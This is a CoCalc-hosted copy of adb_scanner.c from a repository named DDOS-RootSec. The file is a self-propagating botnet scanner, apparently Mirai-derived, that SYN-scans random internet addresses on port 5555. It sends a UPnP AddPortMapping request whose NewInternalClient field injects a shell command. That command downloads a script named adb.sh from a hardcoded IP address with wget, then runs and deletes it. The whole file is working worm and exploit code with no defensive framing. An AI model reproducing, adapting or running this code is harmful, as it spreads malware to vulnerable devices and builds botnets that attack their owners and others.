Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Self Reps/ADB/adb_scanner.c
5038 views
1
#ifdef SELFREP

2


3
#define _GNU_SOURCE

4


5
#ifdef DEBUG

6
    #include <stdio.h>

7
#endif

8
#include <unistd.h>

9
#include <stdlib.h>

10
#include <sys/socket.h>

11
#include <arpa/inet.h>

12
#include <sys/select.h>

13
#include <sys/types.h>

14
#include <time.h>

15
#include <fcntl.h>

16
#include <signal.h>

17
#include <errno.h>

18
#include <string.h>

19
#include <linux/ip.h>

20
#include <linux/tcp.h>

21


22
#include "includes.h"

23
#include "adb_scanner.h"

24
#include "table.h"

25
#include "rand.h"

26
#include "util.h"

27
#include "checksum.h"

28


29
int exploit_scanner_pid = 0, exploit_rsck = 0, exploit_rsck_out = 0;

30
char exploit_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};

31
struct exploit_scanner_connection *conn_table;

32
uint32_t exploit_fake_time = 0;

33


34
int exploit_recv_strip_null(int sock, void *buf, int len, int flags)

35
{

36
    int ret = recv(sock, buf, len, flags);

37


38
    if(ret > 0)

39
    {

40
        int i = 0;

41


42
        for(i = 0; i < ret; i++)

43
        {

44
            if(((char *)buf)[i] == 0x00)

45
            {

46
                ((char *)buf)[i] = 'A';

47
            }

48
        }

49
    }

50


51
    return ret;

52
}

53


54
void exploit_init(void)

55
{

56
    int i = 0;

57
    uint16_t source_port;

58
    struct iphdr *iph;

59
    struct tcphdr *tcph;

60


61
    // Let parent continue on main thread

62
    exploit_scanner_pid = fork();

63
    if(exploit_scanner_pid > 0 || exploit_scanner_pid == -1)

64
        return;

65


66
    LOCAL_ADDR = util_local_addr();

67


68
    rand_init();

69
    exploit_fake_time = time(NULL);

70
    conn_table = calloc(EXPLOIT_SCANNER_MAX_CONNS, sizeof(struct exploit_scanner_connection));

71
    for(i = 0; i < EXPLOIT_SCANNER_MAX_CONNS; i++)

72
    {

73
        conn_table[i].state = EXPLOIT_SC_CLOSED;

74
        conn_table[i].fd = -1;

75
    }

76


77
    // Set up raw socket scanning and payload

78
    if((exploit_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)

79
    {

80
        exit(0);

81
    }

82
    fcntl(exploit_rsck, F_SETFL, O_NONBLOCK | fcntl(exploit_rsck, F_GETFL, 0));

83
    i = 1;

84
    if(setsockopt(exploit_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)

85
    {

86
        close(exploit_rsck);

87
        exit(0);

88
    }

89


90
    do

91
    {

92
        source_port = rand_next() & 0xffff;

93
    }

94
    while(ntohs(source_port) < 1024);

95


96
    iph = (struct iphdr *)exploit_scanner_rawpkt;

97
    tcph = (struct tcphdr *)(iph + 1);

98


99
    // Set up IPv4 header

100
    iph->ihl = 5;

101
    iph->version = 4;

102
    iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));

103
    iph->id = rand_next();

104
    iph->ttl = 64;

105
    iph->protocol = IPPROTO_TCP;

106


107
    // Set up TCP header

108
    tcph->dest = htons(5555);

109
    tcph->source = source_port;

110
    tcph->doff = 5;

111
    tcph->window = rand_next() & 0xffff;

112
    tcph->syn = TRUE;

113


114
	#ifdef DEBUG

115
        printf("[adb] scanner process initialized. scanning started.\n");

116
    #endif

117
	

118
    // Main logic loop

119
    while(TRUE)

120
    {

121
        fd_set fdset_rd, fdset_wr;

122
        struct exploit_scanner_connection *conn;

123
        struct timeval tim;

124
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;

125


126
        // Spew out SYN to try and get a response

127
        if(exploit_fake_time != last_spew)

128
        {

129
            last_spew = exploit_fake_time;

130


131
            for(i = 0; i < EXPLOIT_SCANNER_RAW_PPS; i++)

132
            {

133
                struct sockaddr_in paddr = {0};

134
                struct iphdr *iph = (struct iphdr *)exploit_scanner_rawpkt;

135
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

136


137
                iph->id = rand_next();

138
                iph->saddr = LOCAL_ADDR;

139
                iph->daddr = get_random_ip();

140
                iph->check = 0;

141
                iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));

142


143
                tcph->dest = htons(5555);

144
                tcph->seq = iph->daddr;

145
                tcph->check = 0;

146
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));

147


148
                paddr.sin_family = AF_INET;

149
                paddr.sin_addr.s_addr = iph->daddr;

150
                paddr.sin_port = tcph->dest;

151


152
                sendto(exploit_rsck, exploit_scanner_rawpkt, sizeof(exploit_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));

153
            }

154
        }

155


156
        // Read packets from raw socket to get SYN+ACKs

157
        last_avail_conn = 0;

158
        while(TRUE)

159
        {

160
            int n = 0;

161
            char dgram[1514];

162
            struct iphdr *iph = (struct iphdr *)dgram;

163
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

164
            struct exploit_scanner_connection *conn;

165


166
            errno = 0;

167
            n = recvfrom(exploit_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);

168
            if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)

169
                break;

170


171
            if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))

172
                continue;

173
            if(iph->daddr != LOCAL_ADDR)

174
                continue;

175
            if(iph->protocol != IPPROTO_TCP)

176
                continue;

177
            if(tcph->source != htons(5555))

178
                continue;

179
            if(tcph->dest != source_port)

180
                continue;

181
            if(!tcph->syn)

182
                continue;

183
            if(!tcph->ack)

184
                continue;

185
            if(tcph->rst)

186
                continue;

187
            if(tcph->fin)

188
                continue;

189
            if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)

190
                continue;

191


192
            conn = NULL;

193
            for(n = last_avail_conn; n < EXPLOIT_SCANNER_MAX_CONNS; n++)

194
            {

195
                if(conn_table[n].state == EXPLOIT_SC_CLOSED)

196
                {

197
                    conn = &conn_table[n];

198
                    last_avail_conn = n;

199
                    break;

200
                }

201
            }

202


203
            // If there were no slots, then no point reading any more

204
            if(conn == NULL)

205
                break;

206


207
            conn->dst_addr = iph->saddr;

208
            conn->dst_port = tcph->source;

209
            exploit_setup_connection(conn);

210
        }

211


212
        FD_ZERO(&fdset_rd);

213
        FD_ZERO(&fdset_wr);

214


215
        for(i = 0; i < EXPLOIT_SCANNER_MAX_CONNS; i++)

216
        {

217
            int timeout = 5;

218


219
            conn = &conn_table[i];

220
            //timeout = (conn->state > EXPLOIT_SC_CONNECTING ? 30 : 5);

221


222
            if(conn->state != EXPLOIT_SC_CLOSED && (exploit_fake_time - conn->last_recv) > timeout)

223
            {

224
                close(conn->fd);

225
                conn->fd = -1;

226
                conn->state = EXPLOIT_SC_CLOSED;

227
                util_zero(conn->rdbuf, sizeof(conn->rdbuf));

228


229
                continue;

230
            }

231


232
            if(conn->state == EXPLOIT_SC_CONNECTING || conn->state == EXPLOIT_SC_EXPLOIT_STAGE2 || conn->state == EXPLOIT_SC_EXPLOIT_STAGE3)

233
            {

234
                FD_SET(conn->fd, &fdset_wr);

235
                if(conn->fd > mfd_wr)

236
                    mfd_wr = conn->fd;

237
            }

238
            else if(conn->state != EXPLOIT_SC_CLOSED)

239
            {

240
                FD_SET(conn->fd, &fdset_rd);

241
                if(conn->fd > mfd_rd)

242
                    mfd_rd = conn->fd;

243
            }

244
        }

245


246
        tim.tv_usec = 0;

247
        tim.tv_sec = 1;

248
        nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);

249
        exploit_fake_time = time(NULL);

250


251
        for(i = 0; i < EXPLOIT_SCANNER_MAX_CONNS; i++)

252
        {

253
            conn = &conn_table[i];

254


255
            if(conn->fd == -1)

256
                continue;

257


258
            if(FD_ISSET(conn->fd, &fdset_wr))

259
            {

260
                int err = 0, ret = 0;

261
                socklen_t err_len = sizeof(err);

262


263
                ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);

264
                if(err == 0 && ret == 0)

265
                {

266
                    if(conn->state == EXPLOIT_SC_EXPLOIT_STAGE2)

267
                    {

268
						#ifdef DEBUG

269
							printf("[adb] FD%d exploit_stage=2. sending POST /UD/?9 to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);

270
						#endif

271
						util_strcpy(conn->payload_buf, "POST /UD/?9 HTTP/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Type: text/xml\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://212.60.5.149/adb.sh; chmod 777 adb.sh; sh adb.sh; rm adb.sh;`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>");

272
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);

273
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));

274
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));

275


276
                        conn->state = EXPLOIT_SC_EXPLOIT_STAGE3;

277


278
                        continue;

279
                    }

280
                    else if(conn->state == EXPLOIT_SC_EXPLOIT_STAGE3)

281
                    {

282
                        #ifdef DEBUG

283
							printf("[adb] FD%d exploit_stage=3. closing connection\n", conn->fd);

284
						#endif

285
                        close(conn->fd);

286
                        conn->fd = -1;

287
                        conn->state = EXPLOIT_SC_CLOSED;

288


289
                        continue;

290
                    }

291
                    else

292
                    {

293
                        #ifdef DEBUG

294
							printf("[adb] FD%d exploit_stage=1. connection to %d.%d.%d.%d successful. proceeding to stage 2\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);

295
						#endif

296
                        conn->state = EXPLOIT_SC_EXPLOIT_STAGE2;

297
                    }

298
                }

299
                else

300
                {

301
					close(conn->fd);

302
                    conn->fd = -1;

303
                    conn->state = EXPLOIT_SC_CLOSED;

304


305
                    continue;

306
                }

307
            }

308


309
            if(FD_ISSET(conn->fd, &fdset_rd))

310
            {

311
                while(TRUE)

312
                {

313
                    int ret = 0;

314


315
                    if(conn->state == EXPLOIT_SC_CLOSED)

316
                        break;

317


318
                    if(conn->rdbuf_pos == EXPLOIT_SCANNER_RDBUF_SIZE)

319
                    {

320
                        memmove(conn->rdbuf, conn->rdbuf + EXPLOIT_SCANNER_HACK_DRAIN, EXPLOIT_SCANNER_RDBUF_SIZE - EXPLOIT_SCANNER_HACK_DRAIN);

321
                        conn->rdbuf_pos -= EXPLOIT_SCANNER_HACK_DRAIN;

322
                    }

323


324
                    errno = 0;

325
                    ret = exploit_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, EXPLOIT_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);

326
                    if(ret == 0)

327
                    {

328
                        errno = ECONNRESET;

329
                        ret = -1;

330
                    }

331
                    if(ret == -1)

332
                    {

333
                        if(errno != EAGAIN && errno != EWOULDBLOCK)

334
                        {

335
                            if(conn->state == EXPLOIT_SC_EXPLOIT_STAGE2)

336
                            {

337
                                close(conn->fd);

338
                                exploit_setup_connection(conn);

339
                                continue;

340
                            }

341


342
                            close(conn->fd);

343
                            conn->fd = -1;

344
                            conn->state = EXPLOIT_SC_CLOSED;

345
                            util_zero(conn->rdbuf, sizeof(conn->rdbuf));

346
                        }

347
                        break;

348
                    }

349


350
                    conn->rdbuf_pos += ret;

351
                    conn->last_recv = exploit_fake_time;

352


353
                    int len = util_strlen(conn->rdbuf);

354
                    conn->rdbuf[len] = 0;

355
                }

356
            }

357
        }

358
    }

359
}

360


361
void exploit_kill(void)

362
{

363
    kill(exploit_scanner_pid, 9);

364
}

365


366
static void exploit_setup_connection(struct exploit_scanner_connection *conn)

367
{

368
    struct sockaddr_in addr = {0};

369


370
    if(conn->fd != -1)

371
        close(conn->fd);

372


373
    if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)

374
    {

375
        return;

376
    }

377


378
    conn->rdbuf_pos = 0;

379
    util_zero(conn->rdbuf, sizeof(conn->rdbuf));

380


381
    fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));

382


383
    addr.sin_family = AF_INET;

384
    addr.sin_addr.s_addr = conn->dst_addr;

385
    addr.sin_port = conn->dst_port;

386


387
    conn->last_recv = exploit_fake_time;

388


389
    if(conn->state == EXPLOIT_SC_EXPLOIT_STAGE2 || conn->state == EXPLOIT_SC_EXPLOIT_STAGE3)

390
    {

391
    }

392
    else

393
    {

394
        conn->state = EXPLOIT_SC_CONNECTING;

395
    }

396


397
    connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));

398
}

399


400
static ipv4_t get_random_ip(void)

401
{

402
    uint32_t tmp;

403
    uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;

404


405
    do

406
    {

407
        tmp = rand_next();

408


409
		srand(time(NULL));

410
        o1 = tmp & 0xff;

411
        o2 = (tmp >> 8) & 0xff;

412
        o3 = (tmp >> 16) & 0xff;

413
        o4 = (tmp >> 24) & 0xff;

414
    }

415
    while(o1 == 127 ||                             // 127.0.0.0/8      - Loopback

416
          (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space

417
          (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company

418
          (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company

419
          (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service

420
          (o1 == 10) ||                             // 10.0.0.0/8       - Internal network

421
          (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network

422
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network

423
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved

424
          (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved

425
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use

426
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast

427
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense

428
    );

429


430
	return INET_ADDR(o1,o2,o3,o4);

431
	

432
    /*int randnum = rand() % 3;

433
    if (randnum == 0)

434
    {

435
        return INET_ADDR(156,o2,o3,o4);

436
    }

437
    if (randnum == 1)

438
    {

439
        return INET_ADDR(197,o2,o3,o4);

440
    }

441
	if (randnum == 2)

442
    {

443
        return INET_ADDR(41,o2,o3,o4);

444
    }

445
    if (randnum == 3)

446
    {

447
        return INET_ADDR(o1,o2,o3,o4);

448
    }*/

449
}

450


451
#endif

452


453


454